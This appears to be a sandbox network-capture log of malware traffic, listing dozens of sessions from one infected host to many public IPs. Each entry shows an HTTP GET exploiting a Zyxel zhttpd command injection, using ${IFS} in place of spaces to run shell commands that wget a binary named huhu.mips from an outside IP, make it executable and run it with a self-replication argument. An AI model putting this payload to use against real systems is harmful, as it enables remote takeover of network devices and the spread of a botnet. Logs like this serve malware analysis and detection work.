                                                        Feb 2, 2024 06:20:58.698589087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1586192.168.2.1439046216.137.220.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.698626995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1587192.168.2.1438250182.194.18.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.698643923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1588192.168.2.1460340141.234.175.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.698683977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1589192.168.2.144558235.105.233.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.698712111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1590192.168.2.1447060117.158.176.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.698751926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1591192.168.2.144529441.188.46.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.698786020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1592192.168.2.143752093.237.222.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.698823929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1593192.168.2.1447184223.145.87.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.698860884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1594192.168.2.14377361.31.238.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.698908091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1595192.168.2.1452798199.68.61.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.698925018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1596192.168.2.145600067.30.190.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.698964119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1597192.168.2.146001846.164.92.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.698991060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1598192.168.2.144147637.109.76.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.699034929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1599192.168.2.1440094152.36.63.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.699079990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1600192.168.2.145253698.2.207.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.699140072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1601192.168.2.1435882132.1.225.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.699174881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1602192.168.2.143368447.119.235.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.699217081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1603192.168.2.14533445.22.82.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.699256897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1604192.168.2.144683027.50.138.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.699291945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1605192.168.2.144969478.214.202.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.699347019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1606192.168.2.1437524163.233.183.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.699393988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1607192.168.2.1455656171.157.78.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.699423075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1608192.168.2.144584248.148.158.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.699455976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1609192.168.2.1446704125.88.202.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.699498892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1610192.168.2.14519482.217.63.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.699526072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1611192.168.2.146062672.254.168.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.699563980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1612192.168.2.143937812.204.162.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.699599028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1613192.168.2.1434180200.78.34.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.699645996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1614192.168.2.1453564150.213.64.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.699682951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1615192.168.2.143708465.5.241.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.699736118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1616192.168.2.1451480190.160.248.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.699773073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1617192.168.2.1452834216.207.207.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.699801922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1618192.168.2.1459330142.242.216.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.699851990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1619192.168.2.143375039.181.224.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.699883938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1620192.168.2.144249866.0.86.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.699917078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1621192.168.2.146027858.19.205.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.699959040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1622192.168.2.1450354179.12.190.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.699992895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1623192.168.2.144889237.29.95.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.700017929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1624192.168.2.1449502157.130.100.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.700052023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1625192.168.2.145622224.239.91.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.700082064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1626192.168.2.1460096122.44.17.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.700124025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1627192.168.2.145990694.218.90.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.700161934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1628192.168.2.1434730179.76.207.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.700191975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1629192.168.2.1449242202.68.145.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.700220108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1630192.168.2.1452660187.1.4.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.700275898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1631192.168.2.1459304105.135.174.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.700320959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1632192.168.2.144854640.119.57.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.700344086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1633192.168.2.1447338203.179.65.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.700381041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1634192.168.2.144316819.89.8.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.700432062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1635192.168.2.1443190102.179.184.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.700463057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1636192.168.2.1442066169.220.247.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.700499058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1637192.168.2.1449640191.41.27.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.700558901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1638192.168.2.1455256166.215.54.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.700562954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1639192.168.2.144488040.69.253.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.700613976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1640192.168.2.145322641.14.86.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.700649023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1641192.168.2.1435870167.224.181.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.700692892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1642192.168.2.143964891.157.103.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.700747013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1643192.168.2.146036889.215.235.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.700766087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1644192.168.2.1443572126.136.93.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.700819969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1645192.168.2.143773285.107.215.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.700865984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1646192.168.2.144892245.51.120.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.700891018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1647192.168.2.1460086222.177.191.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.700944901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1648192.168.2.144637077.54.107.157443
                                                        TimestampBytes transferredDirectionData
